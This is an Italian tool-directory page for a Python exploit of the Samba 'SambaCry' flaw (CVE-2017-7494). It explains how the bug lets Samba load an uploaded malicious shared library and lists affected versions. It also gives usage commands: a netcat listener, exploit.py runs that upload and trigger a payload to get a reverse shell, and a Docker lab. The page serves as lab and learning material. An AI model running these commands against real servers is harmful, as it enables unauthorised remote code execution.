Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/yonliud/cve-2017-7494
Analisi delle VulnerabilitàExploitApprendimento e FormazioneLab e Pratica
GitHubyonliud/cve-2017-7494

CVE-2017-7494

Exploit in Python per CVE-2017-7494 (SambaCry) che dimostra l'esecuzione remota di codice autenticata caricando una libreria condivisa dannosa su una condivisione Samba e attivandone il caricamento tramite dlopen.

Vedi Repository
26 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit di SambaCry (CVE-2017-7494)

CVE-2017-7494/SambaCry consente agli utenti autenticati di caricare una libreria condivisa in una cartella scrivibile e di eseguire un attacco di esecuzione utilizzando le librerie caricate.

Spiegazione della vulnerabilità

SambaCry è una vulnerabilità di validazione del percorso nel modo in cui Samba gestisce le richieste di named pipe. Di solito queste pipe vengono usate per consentire ai programmi di comunicare tra loro leggendo e scrivendo dati attraverso un canale simile a un file.

Quando Samba riceve un nome di pipe sconosciuto, le versioni vulnerabili potrebbero trattarlo come il nome di un modulo caricabile dinamicamente. Tali moduli sono di solito librerie .so legittime installate dall'amministratore.

La vulnerabilità consente a un client di fornire un percorso assoluto del filesystem invece di un normale nome di modulo o pipe. Samba non limita correttamente questo percorso e può effettivamente eseguire: dlopen("/data/example.so", ...);.

Il caricamento di una libreria condivisa esegue il suo codice di inizializzazione. Pertanto, un attaccante che può caricare un file .so dannoso in una posizione scrivibile può poi indurre il servizio Samba a caricarlo, con conseguente esecuzione di codice in remoto.

Demo

https://github.com/user-attachments/assets/270c6725-708d-4e72-996a-b6c40e77f010

Utilizzo

  1. Inizializza un listener:
root@kitploit:~
nc -lvnp 4444
  1. Esegui il processo completo
root@kitploit:~
python3 exploit.py --url //127.0.0.1/data --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --lhost 172.26.242.223 --lport 4444 --remote-path /data/payload.so

Per attivare un payload già caricato:

root@kitploit:~
python3 exploit.py --stages trigger --target 127.0.0.1 --port 1445 --user sambacry --password nosambanocry --remote-path /data/payload.so
  1. Nel terminale del listener. Dovrebbe apparire una shell.

Ambiente di laboratorio

Usando il docker-compose.yml preconfigurato per inizializzare il laboratorio vulnerabile.

root@kitploit:~
docker compose up -d

Il laboratorio usa Samba 4.5.9, che è vulnerabile a questa vulnerabilità.

Versioni interessate

3.5.0 - 4.4.13 4.5.0 - 4.5.9 4.6.0 - 4.6.3

Scarica lo strumento